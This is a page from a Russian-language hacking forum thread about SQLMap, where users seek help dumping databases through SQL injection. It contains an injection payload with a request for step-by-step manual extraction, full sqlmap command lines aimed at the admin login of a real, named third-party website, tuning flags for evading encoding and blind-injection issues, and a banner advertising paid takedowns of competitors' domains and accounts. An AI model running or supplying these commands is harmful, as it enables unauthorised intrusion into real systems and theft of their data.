Вопросы по SQLMap

FORUMS

MEMBERS

RECENT POSTS

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Вопросы по SQLMap

Страница 66 из 115

« Первая

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

18.04.2018, 16:41

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Кидай сылку

𝕏 Twitter Reddit Telegram Копировать ссылку

18.04.2018, 18:32

LoginUserName

Новичок

Регистрация: 14.04.2018

Сообщений: 4

Провел на форуме:
1064

Репутация: 0

Цитата:

Сообщение от cat1vo

↑
Скорее всего это не sqlmap сливает "криво", а скрипт в котором найдена инъекция экранирует слеши. Попробуйте проверить руками вывод!
А вы пробовали вручную получить результат? Или кроме как через sqlmap работать с инъекцией в БД вы не умеете? sqlmap - не панацея!

К сожалению, в ручную не особо умею. Можете подсказать, как в ручную по этапно слить базу с такой уязвимость

Post данные

Код:

sasai=-1'%20OR%203*2*1=6%20AND%20000646=000646%20--%20

Буду благодарен

18.04.2018, 22:16

cna

Новичок

Регистрация: 10.02.2018

Сообщений: 10

Провел на форуме:
2613

Репутация: 1

$?пм или читай //threads/43966/

исп норм соответствие урленкоде с --no-cast --hex --text-only кодировку можно указывать и енкодинг разный так же влияет при блиндах таймауты и конечно --drop-set-cookie --flush-session

18.04.2018, 22:30

Muracha

Участник форума

Регистрация: 30.07.2011

Сообщений: 151

Провел на форуме:
54593

Репутация: 0

Код:

root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1" --threads 10 --random-agent --dbms=mysql

Эвристический анализ сообщал об уязвимости, а -v 3 говорил неа.

Такой же результат был при

Код:

root@kali:~# sqlmap -u http://advert.kp.ru/admin//index.php --data "username=admin&passw=admin&login=1"
--level=1 --risk=1 --banner -v 3 --union-cols=1-66
--dbms="MySQL" --technique=EBU --identify-waf --no-cast

Использовал параметры не только на

Код:

http://advert.kp.ru/admin//index.phpно и на http://advert.kp.ru/admin//login.php

Во втором случае мне сразу говорил sqlmap, что уязвимость отсутствует.

19.04.2018, 16:54

Sensoft

Постоянный

Регистрация: 14.06.2015

Сообщений: 396

Провел на форуме:
104689

Репутация: 1

Вытащил BD и когда прописую команду для того чтобы просмотреть tables он начинает заново крутить скулю, чё за нах ?

второй раз такая фигня как поставил последнюю версию sqlmap раньше не когда такого не было

19.04.2018, 16:56

LoginUserName

Новичок

Регистрация: 14.04.2018

Сообщений: 4

Провел на форуме:
1064

Репутация: 0

Цитата:

Сообщение от Sensoft

↑
Вытащил BD и когда прописую команду для того чтобы просмотреть tables он начинает заново крутить скулю, чё за нах ?
второй раз такая фигня как поставил последнюю версию sqlmap раньше не когда такого не было

Пропиши payload, с помощью которого залез в бд

18.05.2018, 21:42

x10

Постоянный

Регистрация: 12.10.2016

Сообщений: 305

Провел на форуме:
107142

Репутация: 1

Друзья подскажите пожалуйста нашел уязвимость

A cookie has been set without the secure flag, which means that the cookie can be accessed via unencrypted connections.

Файл cookie установлен без безопасного флага, а это означает, что к файлу cookie можно получить доступ через незашифрованные соединения.

Как это реализовать?